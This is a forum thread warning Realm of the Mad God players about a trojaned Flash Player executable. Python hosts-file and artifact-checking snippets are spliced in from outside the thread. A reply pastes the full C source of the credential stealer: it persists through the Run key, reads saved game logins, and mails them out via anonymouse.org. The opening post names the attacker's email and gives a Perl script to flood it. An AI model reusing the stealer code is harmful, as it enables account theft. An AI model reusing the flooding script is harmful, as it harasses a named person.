  1. #1
    JustAnoobROTMG

    Warning: don't download rotmg-related EXE anymore

    It's always the same old fart with his shitload of YouTube accounts

    I've seen a "REAL" FLASHPLAYER exe trapped using a very advanced method, just to be able to steal rotmg credentials.
    No, it's not the good old methods you may know. It's kinda sophisticated and requires extended EXE & PE knowledge to be coded.

    Fun fact: He didn't even code it, he used a "one button click" tool, as usual. Was easy to identify by googling. Won't name it for obvious reasons.

    Filthy lamer

    Don't download rotmg-related EXE anymore, not even "flash players".
    Go get the flash players from the ADOBE WEBSITE, AND CLIENTS HERE AS A SWF.

    If you want to spam the dude : naffissekuna5733@gmail.com
    I also have a PERL script

    YOU CAN ALSO PROTECT YOURSELF BY ADDING
    127.0.0.1 anonymouse.org
    127.0.0.1 www.anonymouse.org
    in your hosts file


    Technical details, non-coders don't read:
    Flashplayer.exe has a hijacked function that decrypts and loads an embedded dll "without using any api" (basically it emulates the Windows dll loader) and this dll does what he coded.

    This dll can do what he wants; here it reads the email and password in rotmg.sol, checks them on the realm website, then posts them to a website that will send him a mail with them.

    Grodle, you really are a pathetic piece of shit
    A gift in PERL, asshole:

    Code:
    
    
    ##################################
    #Subroutine to send custom request
    ##################################
    sub sendRequest()
    {
        my $ua = LWP::UserAgent->new();
        $ua->agent($user_agent);
        $ua->proxy(['http', 'ftp'], 'https://127.0.0.1:8118');
    
    
        my $header = new HTTP::Headers
            Accept => $accept,
            Content_Type => $content_type,
            Cache_Control => $cache_control,
            Accept_Language => $accept_language;
    
        my $request = HTTP::Request->new(POST => $url, $header, getrandomdata());
    
        my $res = $ua->request($request);
        #my $body =  $res->as_string;
        if($res->is_success){
               print "OK: " . $res->status_line ."\n";
            }
        else{
              print "Error: " . $res->status_line ."\n";
        }
    
    
        
    }
    
    sub getrandomdata
    {
        #GENERATE RANDOM EMAIL
        
        my $post_data = "to='naffissekuna5733\@gmail.com'";
        $post_data .= "&subject=Account\:";
        $post_data .= randompart();
        $post_data .= ".";
        
        $post_data .= randompart() . "\@gmail.com";
        $post_data .= "&text=".randompassword();
        
        return $post_data;
    }
    Last edited by JustAnoobROTMG; 08-15-2015 at 04:54 PM.
    Due to a recent DMCA takedown attempt we had to remove Faintmako brain. Please do not paid attention to what he say or do.
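
Added example (not part of the original post): a Python check that a hosts file really sends the two names from the post to a sinkhole address, covering comments, mixed case and an earlier line that overrides the block. The sample hosts text is constructed and the function names are this example's own; it assumes the first entry for a name is the one the resolver uses.

```python
import ipaddress

# The two names the post says to block.
BLOCKED = ("anonymouse.org", "www.anonymouse.org")

# Constructed sample: one name blocked, the other overridden by a real address.
SAMPLE = """\
127.0.0.1   localhost
127.0.0.1   Anonymouse.org      # blocked
192.0.2.10  www.anonymouse.org
"""


def parse_hosts(text):
    """Map each lowercase hostname to the first address listed for it."""
    table = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()   # strip comment, split columns
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                             # malformed address, skip line
        for name in fields[1:]:
            table.setdefault(name.lower().rstrip("."), addr)
    return table


def missing_blocks(text, names=BLOCKED):
    """Names not mapped to loopback (127.x, ::1) or the unspecified address."""
    table = parse_hosts(text)
    return [n for n in names
            if n not in table
            or not (table[n].is_loopback or table[n].is_unspecified)]


def with_blocks(text, names=BLOCKED):
    """Hosts text with 127.0.0.1 lines for missing names placed first,
    so they take precedence over any later entry for the same name."""
    todo = missing_blocks(text, names)
    return "".join(f"127.0.0.1 {n}\n" for n in todo) + text


if __name__ == "__main__":
    print("not blocked:", missing_blocks(SAMPLE))
```

A hosts entry only stops lookups that go through the system resolver; it does not remove the file from the machine.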


  3. #2
    kasukali
    Thanks for the warning mate.
    yikes

  4. #3
    HappyMan20
    I actually just found more of the coding side of this on pastebin.

    Code:
    #include <dirent.h>
    #include <winsock2.h>
    #include <windows.h>
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <time.h>
     
    int main(int argc, char **argv){       
            char *a = getenv("appdata"), *dd, ee[MAX_PATH];
            asprintf(&dd, "%s\\orape.exe", a);
            GetModuleFileName(NULL, ee, MAX_PATH);
            if(strcmp(ee, dd)){
                    CopyFile(ee, dd, 0);
                    ShellExecute(NULL, "open", dd, NULL, NULL, SW_SHOWDEFAULT);
                    free(dd);
                    return 0;
            }
           
            HKEY ff;
        RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &ff);
        RegSetValueEx(ff, "Orape", 0, REG_SZ, dd, sizeof(dd));
            free(dd);
        RegCloseKey(ff);
           
            srand(time(NULL));
           
            WSADATA i;
            WSAStartup(MAKEWORD(2, 2), &i);
            struct sockaddr_in t;
            t.sin_family = AF_INET;
            SOCKET s = socket(t.sin_family, SOCK_STREAM, 0);
            t.sin_port = htons(80);
           
            struct hostent *cc = gethostbyname("www.anonymouse.org");
            memcpy(&t.sin_addr, cc->h_addr_list[0], cc->h_length);
            connect(s, (struct sockaddr *)&t, sizeof(t));
           
            char *b = malloc(sizeof(char) * MAX_PATH);
            sprintf(b, "%s\\Macromedia\\Flash Player\\#SharedObjects\\", a);
           
            DIR *c = opendir(b);
        seekdir(c, 2);
            strcat(b, readdir(c)->d_name);
            closedir(c);
           
            chdir(b);
            free(b);
            char d[]= {"localhost\\RoTMG.sol\n"
                   "#localWithNet\\RoTMG.sol\n"
                       "www.realmofthemadgod.com\\RoTMG.sol"};
    z:;
            char *e, *f = strtok((e = strdup(d)), "\n");
            FILE *g;
            while(f){
                    if((g = fopen(f, "rb"))){
                fseek(g, 0, SEEK_END);
                long h = ftell(g);
                rewind(g);
                char j[h + 1];
                fread(j, 1, h, g);
                fclose(g);
     
                size_t k;
                char m[128], n[20];
                for(int o = 0; o < h + 1; o++){
                    if(j[o]     == 'G' &&
                       j[o + 1] == 'U' &&
                       j[o + 2] == 'I' &&
                       j[o + 3] == 'D'){
                        k = (j[o + 5] - 1) / 2;
                        strncpy(m, j + o + 6, k);
                        m[k] = '\0';
                    }
                    if(j[o]     == 'P' &&
                       j[o + 1] == 'a' &&
                       j[o + 2] == 's' &&
                       j[o + 3] == 's' &&
                       j[o + 4] == 'w' &&
                       j[o + 5] == 'o' &&
                       j[o + 6] == 'r' &&
                       j[o + 7] == 'd'){
                        k = (j[o + 9] - 1) / 2;
                        strncpy(n, j + o + 10, k);
                        n[k] = '\0';
                    }
                }
                           
                            char *p, *q;
                            asprintf(&p, "%s//index.html", a);
                            asprintf(&q, "https://realmofthemadgodhrd.appspo*****m/char/list?guid=%s&password=%s", m, n);
                            URLDownloadToFile(NULL, q, p, 0, NULL);
                            free(q);
                            FILE *r = fopen(p, "r");
                            fseek(r, 0, SEEK_END);
                            if(*n && ftell(r) > 64){
                                    char *v, *w, *bb;
                                    asprintf(&v, "%s//rotmg.txt", a);
                                    int aa = asprintf(&w, "to=naffissekuna5733@gmail.com&subject=Account %d&text='%s': '%s',\n", rand(), m, n);
                                    asprintf(&bb, "POST /cgi-bin/anon-email.cgi HTTP/1.1\r\n"
                                  "Accept: text/html, application/xhtml+xml, image/jxr, */*\r\n"
                                  "Referer: https://anonymouse.org/anonemail.html\r\n"
                                  "Accept-Language: fr-FR,fr;q=0.5\r\n"
                                  "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\n"
                                  "Content-Type: application/x-www-form-urlencoded\r\n"
                                  "Accept-Encoding: gzip, deflate\r\n"
                                  "Content-Length: %d\r\n"
                                  "Host: anonymouse.org\r\n"
                                  "Connection: Keep-Alive\r\n"
                                  "Pragma: no-cache\r\n\r\n%s", aa, w);
                                    FILE *x;
                                    if((x = fopen(v, "r"))){
                                            fseek(x, 0, SEEK_END);
                                            char y[ftell(x) + 1];
                                            rewind(x);
                                            fgets(y, sizeof(y), x);
     
                                            if(!strstr(y, w)){
                                                    send(s, bb, strlen(bb), 0);
                                                    x = fopen(v, "a");
                                                    fputs(w, x);
                                            }
                                    } else {
                                            send(s, bb, strlen(bb), 0);
                                            x = fopen(v, "w");
                                            fputs(w, x);
                                    }
                                    free(p);
                                    free(v);
                                    free(w);
                                    free(bb);
                                    fclose(x);
                            }
                            fclose(r);
                    }
                    f = strtok(NULL, "\n");
            }
            free(e);
            Sleep(10);
            goto z;
            closesocket(s);
            WSACleanup();
            return 0;
    }
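
Added example, not part of the thread or of the pasted code: a Python check for the traces that code would leave behind, namely `orape.exe` and `rotmg.txt` under `%APPDATA%` and an `Orape` value in the current user's Run key. The function names are this example's own, and the registry lookup only runs on Windows.

```python
import os
import sys

# All names below come from the C source pasted in this thread.
DROPPED_EXE = "orape.exe"   # self-copy placed in %APPDATA%
SENT_LOG = "rotmg.txt"      # list of credentials already mailed out
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE = "Orape"

def file_artifacts(appdata):
    """Paths under `appdata` matching the files the pasted code creates."""
    paths = (os.path.join(appdata, n) for n in (DROPPED_EXE, SENT_LOG))
    return [p for p in paths if os.path.isfile(p)]

def run_value_suspicious(name, data):
    """True if a Run entry has the value name or mentions the dropped exe."""
    # The pasted code passes sizeof() of a pointer as the data length, so the
    # stored path may be cut short; the value name is the more reliable match.
    return name.lower() == RUN_VALUE.lower() or DROPPED_EXE in data.lower()

def run_key_entries():
    """(name, data) pairs from the HKCU Run key; empty when not on Windows."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
            for i in range(winreg.QueryInfoKey(key)[1]):
                name, data, _kind = winreg.EnumValue(key, i)
                entries.append((name, str(data)))
    except OSError:
        pass  # key missing or unreadable
    return entries

def scan(appdata=None):
    """File and autorun findings for the current user, as printable strings."""
    appdata = appdata or os.environ.get("APPDATA", "")
    findings = file_artifacts(appdata) if appdata else []
    findings += [f"HKCU\\{RUN_KEY}\\{n} = {d}"
                 for n, d in run_key_entries() if run_value_suspicious(n, d)]
    return findings

if __name__ == "__main__":
    for line in scan() or ["no matching artifacts found"]:
        print(line)
```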
